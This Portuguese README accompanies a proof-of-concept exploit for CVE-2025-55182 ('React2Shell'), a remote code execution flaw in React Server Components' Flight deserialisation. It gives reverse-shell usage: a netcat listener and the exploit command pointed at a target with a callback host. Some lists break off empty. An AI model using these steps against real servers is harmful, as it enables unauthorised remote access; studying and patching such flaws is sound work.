Exploit de prova de conceito para CVE-2025-55182 (React2Shell), uma vulnerabilidade de execução remota de código não autenticada em React Server Components por meio de payloads elaborados do protocolo Flight.
CVE-2025-55182, também conhecida como React2Shell, é uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada que afeta os pacotes React Server Components (versões 19.0, 19.1.0, 19.1.1 e 19.2.0).
Esta vulnerabilidade pode permitir que atacantes obtenham execução arbitrária de código em servidores vulneráveis por meio de uma única requisição HTTP manipulada, sem exigir autenticação.
React Server Components usam o protocolo Flight para serializar e desserializar dados de componentes trocados entre cliente e servidor.
Validação inadequada durante esse processo de desserialização pode permitir que payloads especialmente manipulados alterem estruturas internas de objetos e alcancem primitivas perigosas de execução JavaScript.
A vulnerabilidade origina-se de validação insuficiente durante a desserialização de payloads do protocolo Flight de React Server Components (RSC).
Payloads especialmente manipulados podem:
multipart/form-data especialmente manipuladaInicie um listener na sua máquina:
nc -lvnp 4444
Execute o exploit:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Para mitigar esta vulnerabilidade:
Este projeto é fornecido estritamente para:
Os autores não assumem nenhuma responsabilidade por uso indevido ou danos causados por este material. Os usuários são os únicos responsáveis pelo cumprimento de todas as leis e regulamentos aplicáveis.